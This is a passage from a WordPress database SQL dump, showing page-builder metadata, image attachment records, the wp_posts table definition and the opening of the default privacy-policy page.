.page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2639,1849,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2640,1843,'_wp_trash_meta_status','publish'),(2641,1843,'_wp_trash_meta_time','1731000145'),(2642,1850,'_wp_attached_file','2024/11/istockphoto-2015429231-612x612-1.jpg'),(2643,1850,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:612;s:6:\"height\";i:612;s:4:\"file\";s:44:\"2024/11/istockphoto-2015429231-612x612-1.jpg\";s:8:\"filesize\";i:13172;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:12:\"Getty Images\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:167:\"Vector flat illustration in black color. Avatar, user profile, person icon, profile picture. Suitable for social media profiles, icons, screensavers and as a template.\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2644,1851,'_edit_lock','1731000709:1'),(2645,1853,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:222:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:972;i:64;i:973;i:65;i:974;i:66;i:975;i:67;i:976;i:68;i:977;i:69;i:984;i:70;i:985;i:71;i:986;i:72;i:846;i:73;i:847;i:74;i:848;i:75;i:854;i:76;i:850;i:77;i:851;i:78;i:902;i:79;i:855;i:80;i:848;i:81;i:849;i:82;i:850;i:83;i:851;i:84;i:901;i:85;i:853;i:86;i:848;i:87;i:856;i:88;i:850;i:89;i:851;i:90;i:852;i:91;i:857;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:848;i:140;i:854;i:141;i:850;i:142;i:851;i:143;i:902;i:144;i:855;i:145;i:860;i:146;i:861;i:147;i:862;i:148;i:828;i:149;i:829;i:150;i:830;i:151;i:831;i:152;i:832;i:153;i:833;i:154;i:835;i:155;i:830;i:156;i:831;i:157;i:832;i:158;i:833;i:159;i:835;i:160;i:842;i:161;i:843;i:162;i:844;i:163;i:910;i:164;i:911;i:165;i:912;i:166;i:913;i:167;i:914;i:168;i:915;i:169;i:917;i:170;i:912;i:171;i:918;i:172;i:914;i:173;i:915;i:174;i:919;i:175;i:912;i:176;i:920;i:177;i:914;i:178;i:915;i:179;i:921;i:180;i:912;i:181;i:922;i:182;i:914;i:183;i:915;i:184;i:923;i:185;i:912;i:186;i:913;i:187;i:914;i:188;i:915;i:189;i:917;i:190;i:912;i:191;i:913;i:192;i:914;i:193;i:915;i:194;i:917;i:195;i:912;i:196;i:913;i:197;i:914;i:198;i:915;i:199;i:917;i:200;i:912;i:201;i:913;i:202;i:914;i:203;i:915;i:204;i:912;i:205;i:913;i:206;i:914;i:207;i:915;i:208;i:917;i:209;i:912;i:210;i:913;i:211;i:914;i:212;i:915;i:213;i:917;i:214;i:912;i:215;i:913;i:216;i:914;i:217;i:915;i:218;i:917;i:219;i:924;i:220;i:925;i:221;i:926;}}}'),(2646,1855,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2647,1857,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2648,1851,'_wp_trash_meta_status','publish'),(2649,1851,'_wp_trash_meta_time','1731000710'),(2650,1858,'_wp_attached_file','2024/11/67553741-6FB4-461C-900E-D576CD6D0125.jpg'),(2651,1858,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:2880;s:4:\"file\";s:48:\"2024/11/67553741-6FB4-461C-900E-D576CD6D0125.jpg\";s:8:\"filesize\";i:677165;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2652,1859,'_edit_lock','1731007244:1'),(2653,1860,'_wp_attached_file','2024/11/Siv-photo.jpg'),(2654,1860,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:21:\"2024/11/Siv-photo.jpg\";s:8:\"filesize\";i:340853;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2655,1862,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:222:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:972;i:64;i:973;i:65;i:974;i:66;i:975;i:67;i:976;i:68;i:977;i:69;i:984;i:70;i:985;i:71;i:986;i:72;i:846;i:73;i:847;i:74;i:848;i:75;i:854;i:76;i:850;i:77;i:851;i:78;i:902;i:79;i:855;i:80;i:848;i:81;i:849;i:82;i:850;i:83;i:851;i:84;i:901;i:85;i:853;i:86;i:848;i:87;i:856;i:88;i:850;i:89;i:851;i:90;i:852;i:91;i:857;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:848;i:140;i:854;i:141;i:850;i:142;i:851;i:143;i:902;i:144;i:855;i:145;i:860;i:146;i:861;i:147;i:862;i:148;i:828;i:149;i:829;i:150;i:830;i:151;i:831;i:152;i:832;i:153;i:833;i:154;i:835;i:155;i:830;i:156;i:831;i:157;i:832;i:158;i:833;i:159;i:835;i:160;i:842;i:161;i:843;i:162;i:844;i:163;i:910;i:164;i:911;i:165;i:912;i:166;i:913;i:167;i:914;i:168;i:915;i:169;i:917;i:170;i:912;i:171;i:918;i:172;i:914;i:173;i:915;i:174;i:919;i:175;i:912;i:176;i:920;i:177;i:914;i:178;i:915;i:179;i:921;i:180;i:912;i:181;i:922;i:182;i:914;i:183;i:915;i:184;i:923;i:185;i:912;i:186;i:913;i:187;i:914;i:188;i:915;i:189;i:917;i:190;i:912;i:191;i:913;i:192;i:914;i:193;i:915;i:194;i:917;i:195;i:912;i:196;i:913;i:197;i:914;i:198;i:915;i:199;i:917;i:200;i:912;i:201;i:913;i:202;i:914;i:203;i:915;i:204;i:912;i:205;i:913;i:206;i:914;i:207;i:915;i:208;i:917;i:209;i:912;i:210;i:913;i:211;i:914;i:212;i:915;i:213;i:917;i:214;i:912;i:215;i:913;i:216;i:914;i:217;i:915;i:218;i:917;i:219;i:924;i:220;i:925;i:221;i:926;}}}'),(2656,1864,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2657,1866,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2658,1859,'_wp_trash_meta_status','publish'),(2659,1859,'_wp_trash_meta_time','1731007245'),(2660,1867,'_edit_lock','1731008906:1'),(2661,1869,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(2662,1871,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2663,1873,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2664,1867,'_wp_trash_meta_status','publish'),(2665,1867,'_wp_trash_meta_time','1731008907'),(2666,1874,'_edit_lock','1731595717:1'),(2667,1875,'_wp_attached_file','2024/11/Shreyatadipaneni.jpg'),(2668,1875,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:591;s:6:\"height\";i:591;s:4:\"file\";s:28:\"2024/11/Shreyatadipaneni.jpg\";s:8:\"filesize\";i:58320;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2669,1876,'_wp_attached_file','2024/11/Anshul-Gupta.jpg'),(2670,1876,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1984;s:6:\"height\";i:1984;s:4:\"file\";s:24:\"2024/11/Anshul-Gupta.jpg\";s:8:\"filesize\";i:425628;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1731439857\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2671,1878,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:227:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:972;i:64;i:973;i:65;i:974;i:66;i:975;i:67;i:976;i:68;i:977;i:69;i:984;i:70;i:985;i:71;i:986;i:72;i:846;i:73;i:847;i:74;i:848;i:75;i:854;i:76;i:850;i:77;i:851;i:78;i:902;i:79;i:855;i:80;i:848;i:81;i:849;i:82;i:850;i:83;i:851;i:84;i:901;i:85;i:853;i:86;i:848;i:87;i:856;i:88;i:850;i:89;i:851;i:90;i:852;i:91;i:857;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:848;i:140;i:854;i:141;i:850;i:142;i:851;i:143;i:902;i:144;i:855;i:145;i:860;i:146;i:861;i:147;i:862;i:148;i:828;i:149;i:829;i:150;i:830;i:151;i:831;i:152;i:832;i:153;i:833;i:154;i:835;i:155;i:842;i:156;i:843;i:157;i:844;i:158;i:910;i:159;i:911;i:160;i:912;i:161;i:913;i:162;i:914;i:163;i:915;i:164;i:917;i:165;i:912;i:166;i:918;i:167;i:914;i:168;i:915;i:169;i:919;i:170;i:912;i:171;i:920;i:172;i:914;i:173;i:915;i:174;i:921;i:175;i:912;i:176;i:922;i:177;i:914;i:178;i:915;i:179;i:923;i:180;i:912;i:181;i:913;i:182;i:914;i:183;i:915;i:184;i:917;i:185;i:912;i:186;i:913;i:187;i:914;i:188;i:915;i:189;i:917;i:190;i:912;i:191;i:913;i:192;i:914;i:193;i:915;i:194;i:917;i:195;i:912;i:196;i:913;i:197;i:914;i:198;i:915;i:199;i:912;i:200;i:913;i:201;i:914;i:202;i:915;i:203;i:917;i:204;i:912;i:205;i:913;i:206;i:914;i:207;i:915;i:208;i:917;i:209;i:912;i:210;i:913;i:211;i:914;i:212;i:915;i:213;i:917;i:214;i:912;i:215;i:913;i:216;i:914;i:217;i:915;i:218;i:917;i:219;i:912;i:220;i:913;i:221;i:914;i:222;i:915;i:223;i:917;i:224;i:924;i:225;i:925;i:226;i:926;}}}'),(2672,1880,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2673,1882,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2674,1874,'_wp_trash_meta_status','publish'),(2675,1874,'_wp_trash_meta_time','1731595718');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=1883 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (3,1,'2022-02-14 21:44:32','2022-02-14 21:44:32','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://gsudice.dataconn.net.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Comments</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Media</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cookies</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Embedded content from other websites</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in 